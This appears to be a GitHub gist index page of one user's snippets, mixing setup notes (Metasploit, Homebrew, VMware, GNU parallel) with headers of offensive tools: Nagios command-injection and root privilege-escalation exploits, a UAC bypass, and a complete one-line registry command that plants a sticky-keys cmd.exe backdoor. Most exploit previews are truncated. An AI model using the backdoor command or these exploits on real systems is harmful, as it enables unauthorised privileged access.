Skip to content

Instantly share code, notes, and snippets.

View Install Metasploit on OS X
# XCode Command Line Tools
>xcode-select --install
# Install Homebrew
>ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
>echo PATH=/usr/local/bin:/usr/local/sbin:$PATH >> ~/.bash_profile
>source ~/.bash_profile
>brew tap homebrew/versions
View unpackapk.py
#!/usr/bin/env python
# Copyright (C) 2013 thuxnder <patrick@bluebox.com>
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
View packapk.py
#!/usr/bin/env python
# Copyright (C) 2013 mindmac <mindmac.hu@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
@xl7dev
xl7dev / VMwareFusion_Export_ovf.txt
Last active Mar 28, 2020
HowTo Export a VM in OVA format in VMware Fusion for OS X
View VMwareFusion_Export_ovf.txt
> cd /Applications/VMware Fusion.app/Contents/Library/VMware OVF Tool
> ./ovftool --acceptAllEulas /Users/marco/Documents/Virtual\ Machines.localized/Windows\ 8.1\ x64.vmwarevm/Windows\ 8.1\ x64.vmx /Users/marco/Desktop/Win81.ova
@xl7dev
xl7dev / nagios_cmd_injection.py
Created Dec 14, 2016
Nagios Exploit Command Injection CVE-2016-9565
View nagios_cmd_injection.py
#!/usr/bin/env python
intro = """\033[94m
Nagios Core < 4.2.0 Curl Command Injection PoC Exploit (CVE-2016-9565)
nagios_cmd_injection.py ver. 1.0
Discovered & Coded by:
Dawid Golunski
https://legalhackers.com
\033[0m
@xl7dev
xl7dev / nagios-root-privesc.sh
Created Dec 16, 2016
Nagios Exploit Root PrivEsc CVE-2016-9566
View nagios-root-privesc.sh
#!/bin/bash
#
# Nagios Core < 4.2.4 Root Privilege Escalation PoC Exploit
# nagios-root-privesc.sh (ver. 1.0)
#
# CVE-2016-9566
#
# Discovered and coded by:
#
# Dawid Golunski
View cmd_backdoor
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
View UACBypass.ps1
function Invoke-UACBypass {
<#
.SYNOPSIS
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
@xl7dev
xl7dev / install-parallel-centos-6.sh
Created Oct 17, 2017
Install GNU parallel on CentOS 6
View install-parallel-centos-6.sh
#!/bin/bash
# Install GNU parallel on CentOS 6.
# http://software.opensuse.org//download.html?project=home%3Atange&package=parallel
cd /etc/yum.repos.d/
wget http://download.opensuse.org/repositories/home:tange/CentOS_CentOS-6/home:tange.repo
yum install parallel
# Alternative:
View auth_login_fortress.py
#!/usr/bin/env python
# encoding: utf-8
"""
@author: xl7dev
"""
import sys
import pyotp
import pexpect
import logging
You can’t perform that action at this time.